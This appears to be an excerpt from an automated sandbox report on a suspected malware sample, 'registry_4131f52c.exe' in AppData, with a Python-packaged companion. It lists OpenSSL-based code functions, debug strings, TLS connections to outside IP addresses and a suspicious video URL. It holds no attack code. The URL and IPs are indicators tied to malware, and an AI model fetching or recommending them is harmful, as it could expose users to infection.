Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D6190 ERR_put_error,CRYPTO_free,ERR_put_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free, 24_2_00007FFD932D6190
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C8180 CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932C8180
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932BE1B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc, 24_2_00007FFD932BE1B0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1D52 BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free, 24_2_00007FFD932B1D52
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B109B CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup, 24_2_00007FFD932B109B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD933080C0 CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD933080C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F0070 CRYPTO_memcmp, 24_2_00007FFD932F0070
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CE0B0 CRYPTO_THREAD_run_once, 24_2_00007FFD932CE0B0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932BE0A0 CRYPTO_free, 24_2_00007FFD932BE0A0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E4110 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 24_2_00007FFD932E4110
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932BE100 CRYPTO_free, 24_2_00007FFD932BE100
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B16B8 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,X509_free,OPENSSL_sk_pop_free, 24_2_00007FFD932B16B8
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1EAB CRYPTO_memcmp,memchr,CRYPTO_free,CRYPTO_free,CRYPTO_strndup, 24_2_00007FFD932B1EAB
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F87CE CRYPTO_free,CRYPTO_free, 24_2_00007FFD932F87CE
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93318780 HMAC_CTX_new,EVP_CIPHER_CTX_new,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free, 24_2_00007FFD93318780
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FA7B0 EVP_DigestUpdate,EVP_MD_CTX_free,EVP_PKEY_CTX_free,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free, 24_2_00007FFD932FA7B0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B19BA CRYPTO_malloc, 24_2_00007FFD932B19BA
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B15CD EVP_MD_CTX_new,EVP_PKEY_new,EVP_PKEY_assign,DH_free,EVP_PKEY_security_bits,EVP_PKEY_get0_DH,EVP_PKEY_free,DH_get0_key,EVP_PKEY_get1_tls_encodedpoint,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,EVP_PKEY_size,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free, 24_2_00007FFD932B15CD
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1F9B CRYPTO_free,BIO_clear_flags,BIO_set_flags,BIO_snprintf,ERR_add_error_data,memcpy, 24_2_00007FFD932B1F9B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B4660 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free, 24_2_00007FFD932B4660
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FC6C0 CRYPTO_malloc, 24_2_00007FFD932FC6C0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1249 CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,memcpy, 24_2_00007FFD932B1249
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1B18 memset,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,CRYPTO_memcmp, 24_2_00007FFD932B1B18
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1F78 CRYPTO_strdup, 24_2_00007FFD932B1F78
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932DC740 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error, 24_2_00007FFD932DC740
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93302730 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,memcpy,memcpy, 24_2_00007FFD93302730
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD933085A0 CRYPTO_malloc,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,RAND_bytes,EVP_sha256,EVP_EncryptUpdate,EVP_EncryptFinal,HMAC_Update,HMAC_Final, 24_2_00007FFD933085A0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B8590 CRYPTO_zalloc,ERR_put_error, 24_2_00007FFD932B8590
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F0590 CRYPTO_free,CRYPTO_strndup, 24_2_00007FFD932F0590
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1EB5 CRYPTO_strdup,CRYPTO_free, 24_2_00007FFD932B1EB5
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1AB9 CRYPTO_free, 24_2_00007FFD932B1AB9
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B19EC CRYPTO_malloc,ERR_put_error,CRYPTO_free, 24_2_00007FFD932B19EC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2149 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error, 24_2_00007FFD932B2149
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FA5E0 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free, 24_2_00007FFD932FA5E0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B8640 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow, 24_2_00007FFD932B8640
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1500 CRYPTO_free,CRYPTO_memdup,ERR_put_error, 24_2_00007FFD932B1500
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932F848F CRYPTO_malloc, 24_2_00007FFD932F848F
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E4490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset, 24_2_00007FFD932E4490
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B225C CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error, 24_2_00007FFD932B225C
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932BE510 CRYPTO_free,CRYPTO_malloc, 24_2_00007FFD932BE510
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FC510 EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932FC510
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1208 CRYPTO_zalloc,memcpy,memcpy,memcpy,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B1208
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C44F0 CRYPTO_clear_free, 24_2_00007FFD932C44F0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1CE4 CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B1CE4
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1B95 CRYPTO_free,CRYPTO_malloc, 24_2_00007FFD932B1B95
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1230 memcpy,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,memcmp,_time64, 24_2_00007FFD932B1230
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932DCB90 ERR_put_error,ERR_put_error,ERR_put_error,EVP_MD_size,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_malloc,ERR_put_error,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,ERR_put_error,EVP_PKEY_free,X509_get0_pubkey,X509_free,OPENSSL_sk_push,ERR_put_error,X509_free,ERR_put_error, 24_2_00007FFD932DCB90
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CCBB0 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932CCBB0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FABF0 memset,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free, 24_2_00007FFD932FABF0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B6BE0 CRYPTO_zalloc,CRYPTO_free, 24_2_00007FFD932B6BE0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93316AC0 CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 24_2_00007FFD93316AC0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93306B00 EVP_MD_CTX_new,X509_get0_pubkey,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_size,EVP_DigestVerifyInit,EVP_PKEY_id,CRYPTO_malloc,BUF_reverse,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestVerify,BIO_free,EVP_MD_CTX_free,CRYPTO_free, 24_2_00007FFD93306B00
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CCB50 CRYPTO_get_ex_new_index, 24_2_00007FFD932CCB50
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B8B20 CRYPTO_free, 24_2_00007FFD932B8B20
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2252 BIO_s_file,BIO_new,BIO_ctrl,strncmp,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free, 24_2_00007FFD932B2252
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CA970 CRYPTO_THREAD_run_once, 24_2_00007FFD932CA970
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932DC9D0 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error, 24_2_00007FFD932DC9D0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1357 memcmp,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free,memcmp,memcmp,memcpy,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B1357
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B18CF CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 24_2_00007FFD932B18CF
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B250E CRYPTO_free, 24_2_00007FFD932B250E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C8870 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse, 24_2_00007FFD932C8870
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1C26 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc, 24_2_00007FFD932B1C26
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932D4900 X509_VERIFY_PARAM_free,CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,user_finish,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 24_2_00007FFD932D4900
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932DC8E0 CRYPTO_free,CRYPTO_free, 24_2_00007FFD932DC8E0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932C6F93 CRYPTO_free,CRYPTO_strdup,ERR_put_error,ERR_put_error, 24_2_00007FFD932C6F93
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FAF60 X509_get0_pubkey,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_PKEY_CTX_free, 24_2_00007FFD932FAF60
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E8FF0 EVP_MD_size,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,BIO_ctrl,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free, 24_2_00007FFD932E8FF0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2261 CRYPTO_zalloc,ERR_put_error, 24_2_00007FFD932B2261
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932FD040 CRYPTO_free,CRYPTO_free, 24_2_00007FFD932FD040
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1B5E EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 24_2_00007FFD932B1B5E
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932BEE90 EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp, 24_2_00007FFD932BEE90
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932CEE80 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_flags,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname, 24_2_00007FFD932CEE80
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1B4A CRYPTO_THREAD_write_lock,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock, 24_2_00007FFD932B1B4A
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1DAC CONF_parse_list,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B1DAC
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1BF9 ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,OPENSSL_LH_new,OPENSSL_sk_num,EVP_get_digestbyname,EVP_get_digestbyname,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,RAND_bytes,RAND_priv_bytes,RAND_priv_bytes,RAND_priv_bytes, 24_2_00007FFD932B1BF9
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93300D60 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 24_2_00007FFD93300D60
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B22DE ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 24_2_00007FFD932B22DE
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E6DC0 CRYPTO_free,CRYPTO_strdup,CRYPTO_free, 24_2_00007FFD932E6DC0
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD93300E00 CRYPTO_malloc,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,CRYPTO_free, 24_2_00007FFD93300E00
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B172B CRYPTO_free,CRYPTO_strndup, 24_2_00007FFD932B172B
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B8E30 CRYPTO_malloc,ERR_put_error, 24_2_00007FFD932B8E30
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B1FB9 BN_bin2bn,BN_is_zero,CRYPTO_free,CRYPTO_strdup,CRYPTO_clear_free, 24_2_00007FFD932B1FB9
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E2C70 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 24_2_00007FFD932E2C70
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B2545 CRYPTO_malloc,ERR_put_error,BIO_snprintf, 24_2_00007FFD932B2545
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932B17B7 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 24_2_00007FFD932B17B7
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD932E6D50 CRYPTO_free, 24_2_00007FFD932E6D50
Source: https://estudosadulto.educacao.ws/deolane.mp4 HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 45.89.247.53:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318875173.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420233729.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: bOamY.exe, 0000000F.00000003.2312817260.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406050971.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: bOamY.exe, 00000010.00000002.3395178924.00007FFDA3974000.00000002.00000001.01000000.0000000B.sdmp, registry_4131f52c.exe, 00000018.00000002.3394559411.00007FFD83984000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\python3.pdb source: bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3399526152.00007FFDAC122000.00000002.00000001.01000000.0000000E.sdmp, registry_4131f52c.exe, 00000017.00000003.2427026247.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3399419457.00007FFDA5522000.00000002.00000001.01000000.00000023.sdmp, python3.dll.23.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2311807566.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405381148.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb source: pywintypes38.dll.23.dr, pywintypes38.dll.15.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316950781.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417424650.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317942434.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419322035.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: C:\A\31\b\bin\amd64\_bz2.pdb source: bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3398622868.00007FFDA5BAE000.00000002.00000001.01000000.00000011.sdmp, registry_4131f52c.exe, 00000017.00000003.2399145620.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3398060862.00007FFDA546E000.00000002.00000001.01000000.00000026.sdmp, _bz2.pyd.23.dr
Source: Binary string: C:\A\31\b\bin\amd64\_multiprocessing.pdb source: bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2401033777.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.23.dr
Source: Binary string: C:\A\31\b\bin\amd64\_hashlib.pdb source: bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3397261324.00007FFDA57F5000.00000002.00000001.01000000.00000018.sdmp, registry_4131f52c.exe, 00000017.00000003.2400522958.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3397022833.00007FFDA46D5000.00000002.00000001.01000000.0000002D.sdmp
Source: Binary string: ~/.pdbrc source: bOamY.exe, 00000010.00000002.3391793141.000001E4F6B80000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391611067.0000018B973B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314582506.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407183726.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318104601.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419450800.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb.Pdb source: bOamY.exe, 00000010.00000002.3391793141.000001E4F6B80000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391611067.0000018B973B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2313821127.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406546498.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317780907.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418440641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\unicodedata.pdb source: bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3394366786.00007FFD93465000.00000002.00000001.01000000.0000001C.sdmp, registry_4131f52c.exe, 00000017.00000003.2431633460.0000014CAE21C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3392444949.00007FFD83135000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317942434.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419322035.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314973975.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407655702.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2320923162.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420688942.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
